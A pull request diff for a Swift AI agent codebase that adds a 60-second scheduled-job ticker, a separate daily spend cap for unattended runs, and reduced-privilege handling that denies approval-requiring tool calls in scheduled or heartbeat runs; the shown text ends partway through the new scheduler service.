### PR TITLE
Scheduler execution spine: live-but-idle ticker and reduced-privilege proactive runs

### DIFF
--- a/Sources/ClawAgent/Runtime/AgentRuntime.swift
+++ b/Sources/ClawAgent/Runtime/AgentRuntime.swift
@@ -109,7 +109,9 @@ public struct AgentRuntime: Sendable {
     sessionTainted: Bool,
     grant: OneTurnGrant?,
     todayTokens: Int,
-    todayUSD: Double
+    todayUSD: Double,
+    origin: RunOrigin = .interactive,
+    proactiveTodayUSD: Double = 0
   ) async throws -> TurnOutcome {
     let deadline = ContinuousClock.now + .seconds(budget.wallClockDeadlineSeconds)
     let definitions = toolDispatcher?.definitions ?? []
@@ -158,7 +160,9 @@ public struct AgentRuntime: Sendable {
         todayTokens: todayTokens + recordedRunTokens,
         todayUSD: todayUSD + recordedRunUSD,
         estimatedTotalTokens: estimate,
-        estimatedCostUSD: estimatedCost
+        estimatedCostUSD: estimatedCost,
+        origin: origin,
+        proactiveTodayUSD: proactiveTodayUSD + recordedRunUSD
       ) {
         return outcome(.budgetStopped(cap: cap))
       }

--- a/Sources/ClawAgent/Runtime/AgentRuntime.swift
+++ b/Sources/ClawAgent/Runtime/AgentRuntime.swift
@@ -263,7 +263,8 @@ public struct AgentRuntime: Sendable {
           assemblyPrivateData: buildResult.hasPrivateDataAccess,
           runPrivateData: runPrivateData,
           grant: remainingGrant,
-          approvalAlreadyPending: pendingApproval != nil
+          approvalAlreadyPending: pendingApproval != nil,
+          nonInteractive: origin != .interactive
         )
 
         guard let toolDispatcher else {

--- a/Sources/ClawCore/Config/AppConfig.swift
+++ b/Sources/ClawCore/Config/AppConfig.swift
@@ -105,7 +105,11 @@ public struct AppConfig: Sendable, Equatable {
     let pollTimeoutSeconds =
       env[EnvKey.pollTimeout].flatMap(Int.init) ?? EnvDefaults.pollTimeoutSeconds
     let llm = try parseLLMConfig(from: env)
-    let budget = try parseBudget(from: env, llm: llm)
+    let proactivePerDayUSD = try positiveBudgetDouble(
+      env[EnvKey.proactivePerDayUSD],
+      default: EnvDefaults.proactivePerDayUSD
+    )
+    let budget = try parseBudget(from: env, llm: llm, proactivePerDayUSD: proactivePerDayUSD)
 
     let timezone = try parseTimezone(from: env[EnvKey.timezone])
     let schedCatchUpMaxAgeMinutes = try boundedInt(
@@ -119,10 +123,6 @@ public struct AppConfig: Sendable, Equatable {
       key: EnvKey.schedMinIntervalMinutes,
       default: EnvDefaults.schedMinIntervalMinutes,
       minimum: 1
-    )
-    let proactivePerDayUSD = try positiveBudgetDouble(
-      env[EnvKey.proactivePerDayUSD],
-      default: EnvDefaults.proactivePerDayUSD
     )
     let heartbeatEnabled = try boolValue(
       env[EnvKey.heartbeatEnabled],
@@ -217,7 +217,8 @@ public struct AppConfig: Sendable, Equatable {
   /// those). Any present override must parse to a positive value, else fail-closed.
   private static func parseBudget(
     from env: [String: String],
-    llm: LLMConfig
+    llm: LLMConfig,
+    proactivePerDayUSD: Double
   ) throws -> RunBudget {
     let base = RunBudget.default
     return RunBudget(
@@ -227,6 +228,7 @@ public struct AppConfig: Sendable, Equatable {
       retryBudget: llm.retryBudget,
       perRunUSD: try positiveBudgetDouble(env[EnvKey.perRunUSD], default: base.perRunUSD),
       perDayUSD: try positiveBudgetDouble(env[EnvKey.perDayUSD], default: base.perDayUSD),
+      proactivePerDayUSD: proactivePerDayUSD,
       referenceUSDPerToken: try positiveBudgetDouble(
         env[EnvKey.referenceUSDPerToken],
         default: base.referenceUSDPerToken

--- a/Sources/ClawCore/Domain/Tools/ToolDispatching.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolDispatching.swift
@@ -9,6 +9,10 @@ public struct ToolDispatchContext: Sendable, Equatable {
   public let runPrivateData: Bool
   public let grant: OneTurnGrant?
   public let approvalAlreadyPending: Bool
+  /// True for scheduled/heartbeat runs (§10): the gate converts every would-park approval
+  /// outcome into an immediate audited DENY. No default — every construction site decides
+  /// explicitly (secure-by-default; a forgotten site is a compile error, not a privilege grant).
+  public let nonInteractive: Bool
 
   public init(
     sessionTainted: Bool,
@@ -16,7 +20,8 @@ public struct ToolDispatchContext: Sendable, Equatable {
     assemblyPrivateData: Bool,
     runPrivateData: Bool,
     grant: OneTurnGrant?,
-    approvalAlreadyPending: Bool
+    approvalAlreadyPending: Bool,
+    nonInteractive: Bool
   ) {
     self.sessionTainted = sessionTainted
     self.runIngestedUntrusted = runIngestedUntrusted
@@ -24,6 +29,7 @@ public struct ToolDispatchContext: Sendable, Equatable {
     self.runPrivateData = runPrivateData
     self.grant = grant
     self.approvalAlreadyPending = approvalAlreadyPending
+    self.nonInteractive = nonInteractive
   }
 }
 

--- a/Sources/ClawCore/LLM/RunBudget.swift
+++ b/Sources/ClawCore/LLM/RunBudget.swift
@@ -10,6 +10,9 @@ public struct RunBudget: Sendable, Equatable {
   public let retryBudget: Int
   public let perRunUSD: Double
   public let perDayUSD: Double
+  /// The nested proactive (scheduled + heartbeat) daily pool (S3). Always intended < perDayUSD —
+  /// the global cap stays the household kill-switch; this bounds unattended spend alone.
+  public let proactivePerDayUSD: Double
   public let referenceUSDPerToken: Double
   public let maxTurns: Int
   public let maxToolCalls: Int
@@ -22,6 +25,7 @@ public struct RunBudget: Sendable, Equatable {
     retryBudget: Int,
     perRunUSD: Double,
     perDayUSD: Double,
+    proactivePerDayUSD: Double,
     referenceUSDPerToken: Double,
     maxTurns: Int = 12,
     maxToolCalls: Int = 20,
@@ -33,6 +37,7 @@ public struct RunBudget: Sendable, Equatable {
     self.retryBudget = retryBudget
     self.perRunUSD = perRunUSD
     self.perDayUSD = perDayUSD
+    self.proactivePerDayUSD = proactivePerDayUSD
     self.referenceUSDPerToken = referenceUSDPerToken
     self.maxTurns = maxTurns
     self.maxToolCalls = maxToolCalls
@@ -55,6 +60,7 @@ public struct RunBudget: Sendable, Equatable {
     retryBudget: 3,
     perRunUSD: 0.50,
     perDayUSD: 10.00,
+    proactivePerDayUSD: 2.00,
     referenceUSDPerToken: 0.000_015,
     maxTurns: 12,
     maxToolCalls: 20
@@ -71,6 +77,10 @@ public enum BudgetDecision: Sendable, Equatable {
 /// Offline, pre-call spend gate. Reads today's running totals (derived from `provider_usage`,
 /// D4) and this run's estimate, and refuses before any provider call when a cap is met.
 public struct BudgetGate: Sendable {
+  /// The cap name a proactive trip emits. TurnRunner keys the once-per-UTC-day owner DM on it,
+  /// so it is a single named definition, not a call-site string.
+  public static let proactivePerDayCap = "proactive per-day spend"
+
   public let budget: RunBudget
 
   public init(budget: RunBudget) {
@@ -79,12 +89,15 @@ public struct BudgetGate: Sendable {
 
   /// Deny when any spend bound is met. The offline-guaranteed token failsafe (D1) is checked
   /// before the best-effort USD caps, so it still trips when no price is known (`estimatedCostUSD`
-  /// defaults to 0).
+  /// defaults to 0). Global checks run first, unchanged order — then, iff the run is proactive
+  /// (`origin != .interactive`), the nested proactive pool is consulted (spec §11).
   public func preflight(
     todayTokens: Int,
     todayUSD: Double,
     estimatedTotalTokens: Int,
-    estimatedCostUSD: Double = 0
+    estimatedCostUSD: Double = 0,
+    origin: RunOrigin = .interactive,
+    proactiveTodayUSD: Double = 0
   ) -> BudgetDecision {
     if todayUSD >= budget.perDayUSD {
       return .deny(cap: "per-day spend")
@@ -97,6 +110,14 @@ public struct BudgetGate: Sendable {
     }
     if todayUSD + estimatedCostUSD > budget.perDayUSD {
       return .deny(cap: "per-day spend")
+    }
+    if origin != .interactive {
+      if proactiveTodayUSD >= budget.proactivePerDayUSD {
+        return .deny(cap: Self.proactivePerDayCap)
+      }
+      if proactiveTodayUSD + estimatedCostUSD > budget.proactivePerDayUSD {
+        return .deny(cap: Self.proactivePerDayCap)
+      }
     }
     return .allow
   }

--- a/Sources/ClawCore/Persistence/Stores.swift
+++ b/Sources/ClawCore/Persistence/Stores.swift
@@ -143,6 +143,10 @@ public protocol UsageStore: Sendable {
   func recordUsage(_ usage: ProviderUsage) throws
   /// Running totals over `provider_usage` for the calendar-day-UTC window containing `now` (D4).
   func todayTokensAndCost(now: Date) throws -> (tokens: Int, costUSD: Double)
+  /// The same UTC-day window as `todayTokensAndCost(now:)`, restricted to usage whose run's
+  /// origin is IN `origins` (JOIN provider_usage.run_id → runs.id — D6: no denormalized origin
+  /// on usage rows). One query, one day-boundary evaluation (spec §11).
+  func todayTokensAndCost(origins: [RunOrigin], now: Date) throws -> (tokens: Int, costUSD: Double)
   /// Count of `provider_usage` rows per `CostSource` in the calendar-day-UTC window (for doctor).
   func costSourceMix(now: Date) throws -> [CostSource: Int]
 }

--- a/Sources/ClawCore/Persistence/Stores.swift
+++ b/Sources/ClawCore/Persistence/Stores.swift
@@ -118,8 +118,10 @@ public protocol SessionMessageStore: Sendable {
 }
 
 public protocol RunStore: Sendable {
-  /// PENDING → RUNNING through `RunFSM`; false means the run is absent or no longer pending.
-  func pickUp(runId: Int64, now: Date) throws -> Bool
+  /// PENDING → RUNNING through `RunFSM`, returning the run's origin in the same write; nil means
+  /// the run is absent or no longer pending — the guard semantics are unchanged (spec §10,
+  /// preamble deviation 3: one query, no separate origin read).
+  func pickUp(runId: Int64, now: Date) throws -> RunOrigin?
   /// F6 atomicity: assistant message + run→DONE + provider_usage + outbox chunk(s) in ONE txn,
   /// committed before any send. If cancellation/supersede already won, records usage only.
   func commitAssistantTurn(_ turn: AssistantTurn, now: Date) throws -> RunCommitResult

--- a/Sources/ClawData/Database/ClawStores.swift
+++ b/Sources/ClawData/Database/ClawStores.swift
@@ -15,6 +15,7 @@ public struct ClawStores: Sendable {
   public let memory: any MemoryStore
   public let memoryCommands: any MemoryCommandStore
   public let retriever: any Retriever
+  public let scheduledJobs: any ScheduledJobStore
 
   public init(
     allowlist: any AllowlistStore,
@@ -28,7 +29,8 @@ public struct ClawStores: Sendable {
     audit: any AuditLog,
     memory: any MemoryStore,
     memoryCommands: any MemoryCommandStore,
-    retriever: any Retriever
+    retriever: any Retriever,
+    scheduledJobs: any ScheduledJobStore
   ) {
     self.allowlist = allowlist
     self.processed = processed
@@ -42,6 +44,7 @@ public struct ClawStores: Sendable {
     self.memory = memory
     self.memoryCommands = memoryCommands
     self.retriever = retriever
+    self.scheduledJobs = scheduledJobs
   }
 }
 
@@ -62,7 +65,8 @@ extension ClawDatabase {
       audit: AuditLogGRDB(writer: pool),
       memory: MemoryStoreGRDB(writer: pool),
       memoryCommands: MemoryCommandStoreGRDB(writer: pool),
-      retriever: RetrieverGRDB(writer: pool)
+      retriever: RetrieverGRDB(writer: pool),
+      scheduledJobs: ScheduledJobStoreGRDB(writer: pool)
     )
   }
 }

--- a/Sources/ClawData/Stores/Observability/UsageStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Observability/UsageStoreGRDB.swift
@@ -45,7 +45,9 @@ public struct UsageStoreGRDB: UsageStore {
     guard origins.isEmpty == false else {
       return (0, 0)
     }
+
     let dayStart = now.startOfUTCDay
+
     return try writer.readMapping { db in
       // databaseQuestionMarks is GRDB's public helper (GRDB/Utils/Utils.swift), not a
       // project symbol — it renders "?,?,?" for the IN clause.

--- a/Sources/ClawData/Stores/Observability/UsageStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Observability/UsageStoreGRDB.swift
@@ -38,6 +38,39 @@ public struct UsageStoreGRDB: UsageStore {
     }
   }
 
+  public func todayTokensAndCost(
+    origins: [RunOrigin],
+    now: Date
+  ) throws -> (tokens: Int, costUSD: Double) {
+    guard origins.isEmpty == false else {
+      return (0, 0)
+    }
+    let dayStart = now.startOfUTCDay
+    return try writer.readMapping { db in
+      // databaseQuestionMarks is GRDB's public helper (GRDB/Utils/Utils.swift), not a
+      // project symbol — it renders "?,?,?" for the IN clause.
+      let placeholders = databaseQuestionMarks(count: origins.count)
+      let arguments = StatementArguments(origins.map(\.rawValue)) + [dayStart]
+      let row = try Row.fetchOne(
+        db,
+        sql: """
+          SELECT COALESCE(SUM(u.prompt_tokens + u.completion_tokens), 0) AS tokens,
+                 COALESCE(SUM(u.cost_usd), 0) AS cost
+          FROM provider_usage u
+          JOIN runs r ON r.id = u.run_id
+          WHERE r.origin IN (\(placeholders)) AND u.ts >= ?
+          """,
+        arguments: arguments
+      )
+
+      guard let row else {
+        return (0, 0)
+      }
+
+      return (row["tokens"], row["cost"])
+    }
+  }
+
   public func costSourceMix(now: Date) throws -> [CostSource: Int] {
     let dayStart = now.startOfUTCDay
     return try writer.readMapping { db in

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -16,10 +16,12 @@ public struct RunStoreGRDB: RunStore {
       }
 
       let rawOrigin =
-        try String.fetchOne(db, sql: "SELECT origin FROM runs WHERE id = ?", arguments: [runId])
-        ?? RunOrigin.interactive.rawValue
-      // Fail closed: an unknown origin (unwritable via the closed enum) runs reduced-privilege,
-      // never interactive.
+        try String.fetchOne(
+          db,
+          sql: "SELECT origin FROM runs WHERE id = ?",
+          arguments: [runId]
+        ) ?? RunOrigin.interactive.rawValue
+
       return RunOrigin(rawValue: rawOrigin) ?? .scheduled
     }
   }

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -156,6 +156,7 @@ public struct RunStoreGRDB: RunStore {
       guard try Self.transitionRun(db, runId: turn.runId, event: .fail, now: now) != nil else {
         return .ignored
       }
+      try Self.appendJobFailedIfJobRun(db, runId: turn.runId, now: now)
 
       if let usage = turn.usage {
         try Self.insertUsage(db, usage)
@@ -174,7 +175,10 @@ public struct RunStoreGRDB: RunStore {
 
   public func failRun(runId: Int64, now: Date) throws {
     try writer.writeMapping { db in
-      _ = try Self.transitionRun(db, runId: runId, event: .fail, now: now)
+      guard try Self.transitionRun(db, runId: runId, event: .fail, now: now) != nil else {
+        return
+      }
+      try Self.appendJobFailedIfJobRun(db, runId: runId, now: now)
     }
   }
 
@@ -186,7 +190,7 @@ public struct RunStoreGRDB: RunStore {
       let stale = try Row.fetchAll(
         db,
         sql: """
-          SELECT r.id AS run_id, s.session_key AS session_key FROM runs r
+          SELECT r.id AS run_id, r.job_id AS job_id, s.session_key AS session_key FROM runs r
           JOIN sessions s ON s.id = r.session_id
           WHERE r.state IN (?, ?)
           ORDER BY r.id ASC
@@ -201,6 +205,23 @@ public struct RunStoreGRDB: RunStore {
           continue
         }
 
+        try Self.appendJobFailedIfJobRun(db, runId: runId, now: now)
+
+        // A6: job runs resolve the crash-notice target via the job row — sessions carry no chat
+        // id and the synthetic `sched:job:<id>` key parses to nil. Heartbeat runs (job_id NULL,
+        // `sched:heartbeat`) keep skipping here; Phase 4 routes them via config.
+        let jobId: Int64? = row["job_id"]
+        let noticeChatId: Int64?
+        if let jobId {
+          noticeChatId = try Int64.fetchOne(
+            db,
+            sql: "SELECT owner_chat_id FROM scheduled_jobs WHERE id = ?",
+            arguments: [jobId]
+          )
+        } else {
+          noticeChatId = SessionKey.chatId(from: row["session_key"])
+        }
+
         let sentCount =
           try Int.fetchOne(
             db,
@@ -210,10 +231,7 @@ public struct RunStoreGRDB: RunStore {
               """,
             arguments: [runId]
           ) ?? 0
-        guard
-          sentCount == 0,
-          let chatId = SessionKey.chatId(from: row["session_key"])
-        else {
+        guard sentCount == 0, let chatId = noticeChatId else {
           continue
         }
 
@@ -280,6 +298,37 @@ public struct RunStoreGRDB: RunStore {
         consecutiveFailures: consecutiveFailures
       )
     }
+  }
+}
+
+extension RunStoreGRDB {
+  /// FR-C4/spec §14: when a run that belongs to a scheduled job reaches FAILED, `jobFailed`
+  /// rides the SAME transaction as the state flip (house rule). No-op for job-less runs.
+  static func appendJobFailedIfJobRun(_ db: Database, runId: Int64, now: Date) throws {
+    let row = try Row.fetchOne(
+      db,
+      sql: "SELECT job_id, session_id FROM runs WHERE id = ?",
+      arguments: [runId]
+    )
+    guard let row else {
+      return
+    }
+    let jobId: Int64? = row["job_id"]
+    guard let jobId else {
+      return
+    }
+
+    try AuditLogGRDB.insertAudit(
+      db,
+      AuditEvent(
+        actor: .system,
+        action: .jobFailed,
+        decision: "job:\(jobId)",
+        runId: runId,
+        sessionId: row["session_id"],
+        ts: now
+      )
+    )
   }
 
   static func fetchActiveRunId(_ db: Database, sessionId: Int64) throws -> Int64? {

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -315,8 +315,8 @@ extension RunStoreGRDB {
     guard let row else {
       return
     }
-    let jobId: Int64? = row["job_id"]
-    guard let jobId else {
+
+    guard let jobId: Int64 = row["job_id"] else {
       return
     }
 

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -9,9 +9,18 @@ public struct RunStoreGRDB: RunStore {
     self.writer = writer
   }
 
-  public func pickUp(runId: Int64, now: Date) throws -> Bool {
+  public func pickUp(runId: Int64, now: Date) throws -> RunOrigin? {
     try writer.writeMapping { db in
-      try Self.transitionRun(db, runId: runId, event: .pickUp, now: now) != nil
+      guard try Self.transitionRun(db, runId: runId, event: .pickUp, now: now) != nil else {
+        return nil
+      }
+
+      let rawOrigin =
+        try String.fetchOne(db, sql: "SELECT origin FROM runs WHERE id = ?", arguments: [runId])
+        ?? RunOrigin.interactive.rawValue
+      // Fail closed: an unknown origin (unwritable via the closed enum) runs reduced-privilege,
+      // never interactive.
+      return RunOrigin(rawValue: rawOrigin) ?? .scheduled
     }
   }
 

--- a/Sources/ClawGateway/Response/Degradation.swift
+++ b/Sources/ClawGateway/Response/Degradation.swift
@@ -29,6 +29,11 @@ public enum Degradation {
   public static let dailyCapTripped =
     "Heads up — the daily spend cap was reached, so I've paused new requests until the next UTC day."
 
+  /// The once-per-UTC-day owner DM for a proactive-cap trip (§11). Names the cap explicitly and
+  /// says interactive use is unaffected, so the owner knows the household kill-switch did NOT trip.
+  public static let proactiveCapTripped =
+    "Heads up — scheduled/heartbeat runs hit the proactive per-day spend cap and are paused until the next UTC day. Interactive use is unaffected."
+
   /// Maps a runtime degradation classification to its owner-facing reply. Exhaustive over
   /// `DegradationKind`, so a new failure mode forces a deliberate copy decision here.
   public static func message(for kind: DegradationKind) -> String {

--- a/Sources/ClawGateway/Response/SchedulerHealth.swift
+++ b/Sources/ClawGateway/Response/SchedulerHealth.swift
@@ -1,0 +1,81 @@
+import ClawCore
+import Foundation
+
+/// Renders doctor's scheduler/heartbeat rows from persisted `scheduler_state` + config. Pure so
+/// the rendering is unit-testable; doctor is a separate process, so ONLY persisted state is
+/// visible to it (D8) — `dueCount` arrives from a live query at call time, never from storage.
+public enum SchedulerHealth {
+  public struct Row: Sendable, Equatable {
+    public let key: String
+    public let value: String
+
+    public init(key: String, value: String) {
+      self.key = key
+      self.value = value
+    }
+  }
+
+  public static func rows(
+    state: SchedulerState,
+    dueCount: Int?,
+    proactiveTodayUSD: Double?,
+    proactivePerDayUSD: Double,
+    heartbeatEnabled: Bool,
+    heartbeatMaxPerDay: Int,
+    timezone: TimeZone,
+    now: Date
+  ) -> [Row] {
+    let misfire: String
+    if let lastMisfireAt = state.lastMisfireAt {
+      misfire = "\(lastMisfireAt) (skipped \(state.lastMisfireSkippedCount))"
+    } else {
+      misfire = "none"
+    }
+    let todayCount = heartbeatCountToday(state: state, timezone: timezone, now: now)
+    // Spec §11: a proactive-cap trip is visible here even while global spend is under its cap.
+    let proactiveSpend =
+      proactiveTodayUSD.map { spent in String(format: "%.2f", spent) } ?? "unknown"
+
+    return [
+      Row(
+        key: "scheduler.last_tick_at",
+        value: state.lastTickAt.map(String.init(describing:)) ?? "never"
+      ),
+      Row(key: "scheduler.due_count", value: dueCount.map(String.init) ?? "unknown"),
+      Row(key: "scheduler.last_misfire", value: misfire),
+      Row(
+        key: "spend.proactive_today_usd",
+        value: "\(proactiveSpend)/\(String(format: "%.2f", proactivePerDayUSD))"
+      ),
+      Row(key: "heartbeat.enabled", value: heartbeatEnabled ? "on" : "off"),
+      Row(
+        key: "heartbeat.last",
+        value: state.lastHeartbeatAt.map(String.init(describing:)) ?? "never"
+      ),
+      Row(key: "heartbeat.today", value: "\(todayCount)/\(heartbeatMaxPerDay)"),
+    ]
+  }
+
+  /// The stored day counter counts for "today" only when its day stamp (kept in CLAW_TIMEZONE,
+  /// §4.3 — the cap's day boundary aligns with quiet hours, not UTC) matches now's local day; a
+  /// stale stamp reads as zero, matching the cap's rollover semantics.
+  static func heartbeatCountToday(state: SchedulerState, timezone: TimeZone, now: Date) -> Int {
+    guard state.heartbeatCountDay == dayString(for: now, timezone: timezone) else {
+      return 0
+    }
+    return state.heartbeatCount
+  }
+
+  /// "YYYY-MM-DD" in the given zone — the `scheduler_state.heartbeat_count_day` stamp format.
+  static func dayString(for instant: Date, timezone: TimeZone) -> String {
+    var calendar = Calendar(identifier: .gregorian)
+    calendar.timeZone = timezone
+    let components = calendar.dateComponents([.year, .month, .day], from: instant)
+    return String(
+      format: "%04d-%02d-%02d",
+      components.year ?? 0,
+      components.month ?? 0,
+      components.day ?? 0
+    )
+  }
+}

--- a/Sources/ClawGateway/Routing/BudgetBreaker.swift
+++ b/Sources/ClawGateway/Routing/BudgetBreaker.swift
@@ -8,6 +8,9 @@ public actor BudgetBreaker {
   private let budget: RunBudget
   /// The UTC day whose trip has already been DMed; resets implicitly when `now` rolls to a new day.
   private var notifiedDay: Date?
+  /// The UTC day whose PROACTIVE-cap trip has already been DMed (spec §11) — a second latch
+  /// beside the global one, so a proactive trip and a global trip each notify at most once/day.
+  private var notifiedProactiveDay: Date?
 
   public init(budget: RunBudget) {
     self.budget = budget
@@ -27,6 +30,19 @@ public actor BudgetBreaker {
       return false
     }
     notifiedDay = utcDayStart
+
+    return true
+  }
+
+  /// The once-per-UTC-day signal for the proactive-cap owner DM. Unlike `shouldNotifyTrip`, the
+  /// trip is already established by the caller (preflight denied on the proactive cap), so this
+  /// is latch-only — no cap re-check against durable totals.
+  public func shouldNotifyProactiveTrip(now: Date) -> Bool {
+    let utcDayStart = now.startOfUTCDay
+    guard notifiedProactiveDay != utcDayStart else {
+      return false
+    }
+    notifiedProactiveDay = utcDayStart
 
     return true
   }

--- a/Sources/ClawGateway/Routing/TurnRunner.swift
+++ b/Sources/ClawGateway/Routing/TurnRunner.swift
@@ -79,7 +79,7 @@ public struct TurnRunner: TurnDispatching {
     }
 
     let now = Date()
-    guard try runs.pickUp(runId: runId, now: now) else {
+    guard let origin = try runs.pickUp(runId: runId, now: now) else {
       logger.debug("run \(runId) was not pending at pickup; skipping turn")
       return
     }
@@ -92,6 +92,7 @@ public struct TurnRunner: TurnDispatching {
     let buildResult: BuildResult
     let todayTokens: Int
     let todayUSD: Double
+    let proactiveTodayUSD: Double
 
     do {
       snapshot = try sessionMessages.loadContextSnapshot(
@@ -103,6 +104,14 @@ public struct TurnRunner: TurnDispatching {
       let totals = try usageStore.todayTokensAndCost(now: now)
       todayTokens = totals.tokens
       todayUSD = totals.costUSD
+      // The proactive pool is one aggregate over scheduled + heartbeat (spec §11); interactive
+      // runs never pay for the extra query.
+      if origin == .interactive {
+        proactiveTodayUSD = 0
+      } else {
+        proactiveTodayUSD =
+          try usageStore.todayTokensAndCost(origins: [.scheduled, .heartbeat], now: now).costUSD
+      }
 
       buildResult = try contextBuilder.assemble(snapshot: snapshot, sessionId: sessionId)
     } catch StoreError.diskFull {
@@ -136,7 +145,9 @@ public struct TurnRunner: TurnDispatching {
       sessionTainted: snapshot.isTainted,
       grant: grant,
       todayTokens: todayTokens,
-      todayUSD: todayUSD
+      todayUSD: todayUSD,
+      origin: origin,
+      proactiveTodayUSD: proactiveTodayUSD
     )
 
     try await commit(
@@ -144,7 +155,8 @@ public struct TurnRunner: TurnDispatching {
       runId: runId,
       sessionId: sessionId,
       chatId: chatId,
-      ownerNotices: buildResult.ownerNotices
+      ownerNotices: buildResult.ownerNotices,
+      origin: origin
     )
   }
 
@@ -157,12 +169,14 @@ public struct TurnRunner: TurnDispatching {
   ///    then run the shared failure tail with the kind's reply.
   ///  - `.budgetStopped`: the shared failure tail with the budget reply.
   /// Only `StoreError.diskFull` may propagate; every other failure is handled in-band here.
+  // swiftlint:disable:next function_parameter_count
   private func commit(
     _ outcome: TurnOutcome,
     runId: Int64,
     sessionId: Int64,
     chatId: Int64,
-    ownerNotices: [String]
+    ownerNotices: [String],
+    origin: RunOrigin
   ) async throws {
     let committedAt = Date()
 
@@ -252,6 +266,9 @@ public struct TurnRunner: TurnDispatching {
         decision: cap,
         at: committedAt
       )
+      if origin != .interactive, cap == BudgetGate.proactivePerDayCap {
+        await notifyProactiveCapIfTripped(chatId: chatId, runId: runId, sessionId: sessionId)
+      }
     }
   }
 
@@ -337,6 +354,36 @@ public struct TurnRunner: TurnDispatching {
         actor: .system,
         action: .budgetTripped,
         decision: "daily_cap",
+        runId: runId,
+        sessionId: sessionId,
+        ts: Date()
+      )
+    )
+  }
+
+  /// Post-commit proactive-cap owner DM (§11): once per UTC day via the breaker's second latch.
+  /// The trip itself is already durable (the run FAILED with the cap named); DM + audit are
+  /// best-effort, mirroring `notifyDailyCapIfTripped`.
+  private func notifyProactiveCapIfTripped(
+    chatId: Int64,
+    runId: Int64,
+    sessionId: Int64
+  ) async {
+    guard let breaker, let transport else {
+      return
+    }
+
+    let shouldNotify = await breaker.shouldNotifyProactiveTrip(now: Date())
+    guard shouldNotify else {
+      return
+    }
+
+    _ = try? await transport.sendMessage(chatId: chatId, text: Degradation.proactiveCapTripped)
+    try? audit.appendAudit(
+      AuditEvent(
+        actor: .system,
+        action: .budgetTripped,
+        decision: "proactive_per_day",
         runId: runId,
         sessionId: sessionId,
         ts: Date()

--- a/Sources/ClawGateway/Services/SchedulerService.swift
+++ b/Sources/ClawGateway/Services/SchedulerService.swift
@@ -1,0 +1,219 @@
+import ClawAgent
+import ClawCore
+import Foundation
+import Logging
+import ServiceLifecycle
+
+/// The 60 s wall-clock ticker (spec §5): scans due jobs, claims each through the store's fused
+/// compare-and-advance (the ONE overlap guard — §5.2), applies the misfire table (§5.3), and
+/// enqueues claimed fires onto their job session's lane. Tick-level mutual exclusion is
+/// structural: one instance, one sequential loop; cross-process exclusion is the startup flock.
+public struct SchedulerService: Service {
+  /// The tick grain (spec §5.3, pinned — not config): coarse enough to be negligible load, fine
+  /// enough that an on-time fire lands within a minute of its occurrence. The misfire table's
+  /// "lateness ≤ grain ⇒ on time" row is defined against this constant.
+  public static let tickInterval: Duration = .seconds(60)
+
+  /// Cap on the misfire-count scan (observability only — the count feeds `jobMisfire` audit
+  /// details, never control flow), so a months-old due date cannot enumerate unbounded dates.
+  static let misfireCountLimit = 1_000
+
+  private let jobs: any ScheduledJobStore
+  private let lanes: SessionLaneRegistry
+  private let turns: any TurnDispatching
+  private let calculator: OccurrenceCalculator
+  private let catchUpMaxAge: Duration
+  private let now: @Sendable () -> Date
+  private let sleep: @Sendable (Duration) async throws -> Void
+  private let logger: Logger
+
+  public init(
+    jobs: any ScheduledJobStore,
+    lanes: SessionLaneRegistry,
+    turns: any TurnDispatching,
+    calculator: OccurrenceCalculator,
+    catchUpMaxAge: Duration,
+    now: @escaping @Sendable () -> Date,
+    sleep: @escaping @Sendable (Duration) async throws -> Void,
+    logger: Logger
+  ) {
+    self.jobs = jobs
+    self.lanes = lanes
+    self.turns = turns
+    self.calculator = calculator
+    self.catchUpMaxAge = catchUpMaxAge
+    self.now = now
+    self.sleep = sleep
+    self.logger = logger
+  }
+
+  public func run() async throws {
+    logger.info("scheduler starting")
+    await cancelWhenGracefulShutdown {
+      // Tick immediately on start (restart recovery — §5.1), then sleep between ticks.
+      while !Task.isCancelled {
+        await tick()
+        do {
+          try await sleep(Self.tickInterval)
+        } catch {
+          break  // cancellation unwinds the loop
+        }
+      }
+    }
+    logger.info("scheduler stopped")
+  }
+
+  // MARK: - Load-bearing
+
+  /// One scan-and-fire pass. Non-throwing by contract: the ticker must survive every store
+  /// failure (a failed tick is retried by the next one) rather than crash the service group.
+  func tick() async {
+    let tickTime = now()
+    do {
+      try jobs.recordTick(at: tickTime)
+    } catch {
+      logger.error("scheduler recordTick failed: \(error)")
+    }
+
+    let dueJobs: [ScheduledJob]
+    do {
+      dueJobs = try jobs.dueJobs(now: tickTime)
+    } catch {
+      logger.error("scheduler due scan failed: \(error)")
+      return
+    }
+
+    for job in dueJobs {
+      await fire(job: job, tickTime: tickTime)
+    }
+  }
+
+  /// The §5.3 lateness table for one due job — all wall clock, never tick counts.
+  private func fire(job: ScheduledJob, tickTime: Date) async {
+    guard let due = job.nextOccurrence else {
+      return  // dueJobs' predicate makes this unreachable; defensive, never crash the ticker
+    }
+    guard let timezone = TimeZone(identifier: job.timezone) else {
+      logger.error("job \(job.id) has an unresolvable timezone \(job.timezone); not firing")
+      return
+    }
+
+    let lateness = tickTime.timeIntervalSince(due)
+    let maxAgeSeconds = Double(catchUpMaxAge.components.seconds)
+
+    do {
+      if lateness >= maxAgeSeconds {
+        try skipMisfire(job: job, due: due, timezone: timezone, tickTime: tickTime)
+        return
+      }
+
+      let fireAt: Date
+      if lateness <= Double(Self.tickInterval.components.seconds) {
+        fireAt = due  // on time / one tick late
+      } else if let envelope = job.recurrence {
+        // Coalesce: N missed occurrences inside the window fire ONCE, at the latest missed
+        // occurrence ≤ now; the CAS still matches the stored due (§5.2 — due vs T_fire).
+        // Anchor = the stored due: every advance stays on the chain the confirm preview
+        // showed (for everyNMinutes the phase is due + k·N; time-of-day rules are anchor-inert).
+        fireAt =
+          calculator.latestOccurrence(
+            rule: envelope.rule,
+            timezone: timezone,
+            anchor: due,
+            after: due.addingTimeInterval(-1),
+            atOrBefore: tickTime
+          ) ?? due
+      } else {
